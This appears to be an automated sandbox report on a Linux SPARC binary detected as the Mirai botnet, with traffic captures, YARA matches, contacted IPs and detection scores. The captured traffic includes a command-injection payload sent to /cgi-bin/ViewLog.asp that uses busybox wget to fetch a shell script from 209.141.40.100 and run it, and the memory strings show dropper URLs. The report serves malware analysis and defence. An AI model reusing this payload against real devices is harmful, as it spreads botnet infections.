Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: thttpd/2.29 23May2018Access-Control-Allow-Origin: *Content-Type: text/html; charset=UTF-8Date: Mon, 12 Jan 1970 00:05:18 GMTLast-Modified: Mon, 12 Jan 1970 00:05:18 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 63 63 39 39 39 39 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 0a 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 27 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 20 20 20 20 3c 68 72 3e 0a 0a 20 20 20 20 3c 61 64 64 72 65 73 73 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 39 20 32 33 4d 61 79 32 30 31 38 3c 2f 61 3e 3c 2f 61 64 64 72 65 73 73 3e 0a 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head> <meta http-equiv="Content-type" content="text/html;charset=UTF-8"> <title>404 Not Found</title> </head> <body bgcolor="#cc9999" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>404 Not Found</h2>The requested URL '/cgi-bin/ViewLog.asp' was not found on this server. <hr> <address><a href="http://www.acme.com/software/thttpd/">thttpd/2.29 23May2018</a></address> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 29 Oct 2021 18:15:32 GMTServer: Apache/2.2.21 (Unix) PHP/5.2.17Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 193Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3b 0f 82 40 10 84 fb fb 15 2b 8d 15 ac af f2 72 85 3c 22 09 2a 05 9a 50 02 b7 91 4b 80 23 dc 89 f1 df cb a3 b1 9c d9 6f 76 86 6f 82 bb 9f e5 69 08 97 ec 9a 40 fa 38 27 b1 0f 8e 8b 18 87 59 84 18 64 c1 7a 39 78 3b c4 f0 e6 08 c6 6b db 36 82 d7 54 c8 49 58 65 1b 12 a7 dd 11 22 3d 94 4a 4a ea 38 ae 26 e3 b8 40 bc d4 f2 3b e7 f6 e2 8f 99 14 e3 bd c8 f5 1b a4 ee b6 16 ea 62 24 e8 69 68 95 31 4a 77 60 35 14 55 45 c6 00 56 2f e5 96 aa c3 a7 a2 4f a2 5f 5e 61 7a 36 13 b5 32 60 68 18 69 f0 38 f6 73 e1 52 35 3d 9f 27 b2 1f bd cc 11 ff dd 00 00 00 Data Ascii: M;@+r<"*PK#ovoi@8'Ydz9x;k6TIXe"=JJ8&@;b$ih1Jw`5UEV/O_^az62`hi8sR5='
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 19:19:22 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 21:29:29 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainTransfer-Encoding: chunked

Source: Dy4UCGJRnG, 5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	String found in binary or memory: http://209.141.40.100/bins/x86
Source: Dy4UCGJRnG, 5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	String found in binary or memory: http://209.141.40.100/w.sh;
Source: Dy4UCGJRnG, 5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Dy4UCGJRnG, 5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown

HTTP traffic detected: POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 192.168.0.14:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.20.0Content-Length: 227Content-Type: application/x-www-form-urlencodedData Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 32 30 39 2e 31 34 31 2e 34 30 2e 31 30 30 2f 77 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 77 2e 73 68 3b 20 73 68 20 77 2e 73 68 Data Ascii: /bin/busybox wget http://209.141.40.100/w.sh; chmod +x w.sh; sh w.sh

Source: Dy4UCGJRnG, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5239.1.0000000060226c23.0000000052bc6aaf.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5241.1.0000000060226c23.0000000052bc6aaf.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5248.1.0000000060226c23.0000000052bc6aaf.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5241.1.000000003df39fd4.0000000084fd119a.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5248.1.000000003df39fd4.0000000084fd119a.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal76.troj.lin@0/0@0/0

Source: Dy4UCGJRnG

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 48726 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48726 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48726 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56856
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56888
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56896
Source: unknown	Network traffic detected: HTTP traffic on port 48726 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56904
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56918
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56926
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56934
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56958
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56968
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56968
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 56986
Source: unknown	Network traffic detected: HTTP traffic on port 48726 -> 37215

Source: /tmp/Dy4UCGJRnG (PID: 5239)

Queries kernel information via 'uname':

Source: Dy4UCGJRnG, 5239.1.0000000037283747.000000007d57f45b.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sparc
Source: Dy4UCGJRnG, 5239.1.0000000064153c89.00000000436e280b.rw-.sdmp	Binary or memory string: Yx86_64/usr/bin/qemu-sparc/tmp/Dy4UCGJRnGSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Dy4UCGJRnG
Source: Dy4UCGJRnG, 5239.1.0000000037283747.000000007d57f45b.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/sparc
Source: Dy4UCGJRnG, 5239.1.0000000064153c89.00000000436e280b.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sparc

Stealing of Sensitive Information:

Yara detected Mirai

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: Dy4UCGJRnG, type: SAMPLE
Source: Yara match	File source: 5241.1.000000003df39fd4.0000000084fd119a.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5248.1.000000003df39fd4.0000000084fd119a.r-x.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Mirai

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: Dy4UCGJRnG, type: SAMPLE
Source: Yara match	File source: 5241.1.000000003df39fd4.0000000084fd119a.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5248.1.000000003df39fd4.0000000084fd119a.r-x.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	OS Credential Dumping	Security Software Discovery11	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol5	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Ingress Tool Transfer4	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Dy4UCGJRnG	46%	Virustotal		Browse
Dy4UCGJRnG	57%	ReversingLabs	Linux.Trojan.Mirai

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://209.141.40.100/w.sh;	0%	Avira URL Cloud	safe
http://209.141.40.100/bins/x86	0%	Avira URL Cloud	safe
http://192.168.0.14:80/cgi-bin/ViewLog.asp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://192.168.0.14:80/cgi-bin/ViewLog.asp	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://209.141.40.100/w.sh;	Dy4UCGJRnG, 5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	false	Avira URL Cloud: safe	unknown
http://209.141.40.100/bins/x86	Dy4UCGJRnG, 5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	Dy4UCGJRnG, 5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	Dy4UCGJRnG, 5239.1.000000003df39fd4.0000000084fd119a.r-x.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
156.130.158.120	unknown	United States	29975	VODACOM-ZA	false
95.252.144.254	unknown	Italy	3269	ASN-IBSNAZIT	false
2.36.96.219	unknown	Italy	30722	VODAFONE-IT-ASNIT	false
41.108.48.186	unknown	Algeria	36947	ALGTEL-ASDZ	false
95.150.154.175	unknown	United Kingdom	12576	EELtdGB	false
85.33.215.214	unknown	Italy	3269	ASN-IBSNAZIT	false
157.105.247.183	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
62.125.156.10	unknown	United Kingdom	702	UUNETUS	false
62.168.37.195	unknown	Czech Republic	5588	GTSCEGTSCentralEuropeAntelGermanyCZ	false
94.8.166.132	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
85.66.79.209	unknown	Hungary	20845	DIGICABLEHU	false
31.167.93.129	unknown	Saudi Arabia	35819	MOBILY-ASEtihadEtisalatCompanyMobilySA	false
95.181.161.82	unknown	Russian Federation	50214	QWARTARU	false
41.42.142.154	unknown	Egypt	8452	TE-ASTE-ASEG	false
95.28.117.17	unknown	Russian Federation	8402	CORBINA-ASOJSCVimpelcomRU	false
31.58.18.189	unknown	Iran (ISLAMIC Republic Of)	31549	RASANAIR	false
85.142.138.106	unknown	Russian Federation	3267	RUNNETRU	false
62.40.187.71	unknown	Austria	8339	KABSI-ASAT	false
85.38.44.219	unknown	Italy	3269	ASN-IBSNAZIT	false
94.193.8.122	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
31.179.155.54	unknown	Poland	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
94.78.81.208	unknown	Turkey	44558	NETONLINETR	false
95.123.15.156	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
62.242.237.22	unknown	Denmark	3292	TDCTDCASDK	false
95.94.139.70	unknown	Portugal	2860	NOS_COMUNICACOESPT	false
31.122.161.107	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
94.94.61.77	unknown	Italy	3269	ASN-IBSNAZIT	false
41.198.207.251	unknown	South Africa	327693	ECHO-SPZA	false
197.33.36.90	unknown	Egypt	8452	TE-ASTE-ASEG	false
95.236.91.143	unknown	Italy	3269	ASN-IBSNAZIT	false
62.19.15.19	unknown	Italy	16232	ASN-TIMServiceProviderIT	false
88.159.204.76	unknown	Netherlands	1136	KPNKPNNationalEU	false
95.38.211.201	unknown	Iran (ISLAMIC Republic Of)	41881	FANAVA-ASFanavaGroupCommunicationCoIR	false
31.221.210.148	unknown	Spain	16299	XFERAES	false
41.186.122.43	unknown	Rwanda	36890	MTNRW-ASNRW	false
197.92.49.1	unknown	South Africa	10474	OPTINETZA	false
157.47.67.105	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
85.21.130.14	unknown	Russian Federation	8402	CORBINA-ASOJSCVimpelcomRU	false
94.218.73.2	unknown	Germany	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
95.52.196.241	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
95.47.59.211	unknown	Czech Republic	51131	SEVEN-ASRU	false
41.57.232.69	unknown	Ghana	37103	BUSYINTERNETGH	false
85.19.149.180	unknown	Norway	25400	TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO	false
157.57.242.34	unknown	United States	3598	MICROSOFT-CORP-ASUS	false
31.142.125.246	unknown	Turkey	16135	TURKCELL-ASTurkcellASTR	false
197.197.89.73	unknown	Egypt	36992	ETISALAT-MISREG	false
90.131.24.64	unknown	Sweden	1257	TELE2EU	false
171.148.60.105	unknown	United States	9874	STARHUB-MOBILEStarHubLtdSG	false
197.59.229.17	unknown	Egypt	8452	TE-ASTE-ASEG	false
95.126.182.162	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
66.113.21.36	unknown	United States	15221	STRATUSIQUS	false
41.144.100.8	unknown	South Africa	5713	SAIX-NETZA	false
95.51.134.79	unknown	Poland	5617	TPNETPL	false
62.118.118.46	unknown	Russian Federation	8359	MTSRU	false
62.16.54.174	unknown	Russian Federation	15640	FPIC-ASRU	false
95.71.223.70	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
31.219.129.239	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	false
62.65.150.141	unknown	Switzerland	15517	NETSTREAM-CH	false
41.129.126.207	unknown	Egypt	24863	LINKdotNET-ASEG	false
24.130.12.151	unknown	United States	7922	COMCAST-7922US	false
62.92.203.193	unknown	Norway	2119	TELENOR-NEXTELTelenorNorgeASNO	false
66.9.68.14	unknown	United States	18885	M2NGAGE2US	false
134.6.198.59	unknown	United States	16504	GRANITEUS	false
41.252.35.47	unknown	Libyan Arab Jamahiriya	21003	GPTC-ASLY	false
197.202.209.158	unknown	Algeria	36947	ALGTEL-ASDZ	false
157.105.247.142	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
41.187.12.182	unknown	Egypt	20928	NOOR-ASEG	false
31.14.164.59	unknown	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	false
70.160.227.214	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
62.98.1.199	unknown	Italy	1267	ASN-WINDTREIUNETEU	false
223.199.27.178	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
85.158.231.110	unknown	Austria	8692	BRZAT	false
95.94.141.249	unknown	Portugal	2860	NOS_COMUNICACOESPT	false
95.211.189.192	unknown	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	false
31.59.81.131	unknown	Iran (ISLAMIC Republic Of)	31549	RASANAIR	false
112.245.212.135	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
62.140.160.229	unknown	Netherlands	28995	ANTHOS-ASAnthosAmsterdamprovidesservicesforseveralint	false
31.61.177.127	unknown	Poland	5617	TPNETPL	false
94.216.58.20	unknown	Germany	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
95.44.121.88	unknown	Ireland	5466	EIRCOMInternetHouseIE	false
50.53.220.241	unknown	United States	27017	ZIPLY-FIBER-LEGACY-ASNUS	false
31.238.25.176	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
95.20.61.81	unknown	Spain	12479	UNI2-ASES	false
182.63.229.4	unknown	Malaysia	4818	DIGIIX-APDiGiTelecommunicationsSdnBhdMY	false
31.179.180.35	unknown	Poland	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
19.72.216.253	unknown	United States	3	MIT-GATEWAYSUS	false
85.209.47.150	unknown	Ukraine	209825	IBNETUA	false
41.227.43.56	unknown	Tunisia	2609	TN-BB-ASTunisiaBackBoneASTN	false
85.89.121.168	unknown	Russian Federation	5429	IIP-NET-AS5429RU	false
85.170.165.117	unknown	France	21502	ASN-NUMERICABLEFR	false
94.100.58.198	unknown	Serbia	47588	TELCOMMUNICATIONS-ASRS	false
31.142.52.199	unknown	Turkey	16135	TURKCELL-ASTurkcellASTR	false
197.82.0.30	unknown	South Africa	10474	OPTINETZA	false
31.211.62.229	unknown	Russian Federation	47938	FASTNET-ASRU	false
94.60.211.190	unknown	Portugal	12353	VODAFONE-PTVodafonePortugalPT	false
62.96.244.71	unknown	United Kingdom	8220	COLTCOLTTechnologyServicesGroupLimitedGB	false
31.16.255.135	unknown	Germany	31334	KABELDEUTSCHLAND-ASDE	false
94.104.217.4	unknown	Belgium	47377	ORANGE_BELGIUM_SAKPNBelgiumBusinessNVhasbeenacquired	false
19.172.192.200	unknown	United States	3	MIT-GATEWAYSUS	false
62.64.57.93	unknown	France	8362	20rueDenisPapinFR	false

Runtime Messages

Command:	/tmp/Dy4UCGJRnG
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Infected By Cult
Standard Error:

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
95.28.117.17	1pXwIJR8QV	Get hash	malicious	Browse
95.123.15.156	8EddA0qHLY	Get hash	malicious	Browse
31.122.161.107	DEMONS.x86	Get hash	malicious	Browse
95.181.161.82	lv2E1Fn8Eo	Get hash	malicious	Browse
62.125.156.10	UnHAnaAW.x86	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VODACOM-ZA	wTFR3LK4Mo	Get hash	malicious	Browse	156.64.215.165
	VdcjZYprbt	Get hash	malicious	Browse	156.22.182.31
	apep.arm7	Get hash	malicious	Browse	41.30.254.97
	apep.arm	Get hash	malicious	Browse	156.133.239.108
	yOtRXukeq9	Get hash	malicious	Browse	156.49.135.69
	yFbmGHoONE	Get hash	malicious	Browse	156.129.36.250
	zju8TB277l	Get hash	malicious	Browse	156.2.60.196
	JYWllP5wHP	Get hash	malicious	Browse	156.131.224.191
	uwgXkY20gB	Get hash	malicious	Browse	41.18.99.139
	arm7	Get hash	malicious	Browse	156.72.152.79
	arm	Get hash	malicious	Browse	156.133.239.102
	x86	Get hash	malicious	Browse	156.72.152.59
	FWsCarsq8Q	Get hash	malicious	Browse	156.7.48.23
	p6j5MzMpDW	Get hash	malicious	Browse	156.2.60.187
	BMP4Nk5TTq	Get hash	malicious	Browse	156.132.102.5
	B6WwgS8sUq	Get hash	malicious	Browse	41.12.183.226
	PFD33mzc5l	Get hash	malicious	Browse	156.23.161.115
	tqQd9hibj0	Get hash	malicious	Browse	156.49.200.174
	buiodawbdawbuiopdw.x86	Get hash	malicious	Browse	156.37.137.189
	buiodawbdawbuiopdw.arm7	Get hash	malicious	Browse	156.2.12.217
ASN-IBSNAZIT	nUDLlJvoP4	Get hash	malicious	Browse	95.225.107.162
	heHfsavwfJ	Get hash	malicious	Browse	95.245.191.253
	RVG73cR3DP	Get hash	malicious	Browse	87.8.110.250
	9QPGr9LMaq	Get hash	malicious	Browse	31.198.254.110
	dqnskKAmQq	Get hash	malicious	Browse	88.45.10.182
	A0Pvsxsjf7	Get hash	malicious	Browse	95.225.107.130
	32UX3eB2m0	Get hash	malicious	Browse	95.255.148.89
	5odXR1ZmTd	Get hash	malicious	Browse	94.84.106.240
	x86	Get hash	malicious	Browse	62.110.19.21
	vEBWe85OY5	Get hash	malicious	Browse	82.60.20.182
	S1WMHUXAQU	Get hash	malicious	Browse	95.236.91.135
	5mLAGfiGBf	Get hash	malicious	Browse	5.99.27.231
	st2AAeCXsR	Get hash	malicious	Browse	79.21.225.126
	sj2211QUKu	Get hash	malicious	Browse	88.61.50.216
	bKHI9UT0D1	Get hash	malicious	Browse	151.99.94.9
	eNrYzJWFvB	Get hash	malicious	Browse	80.21.131.152
	arm7	Get hash	malicious	Browse	79.56.128.228
	x86_64	Get hash	malicious	Browse	94.92.80.206
	en94piXmL6	Get hash	malicious	Browse	79.1.2.209
	wRmHCEnowI	Get hash	malicious	Browse	79.21.137.181

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
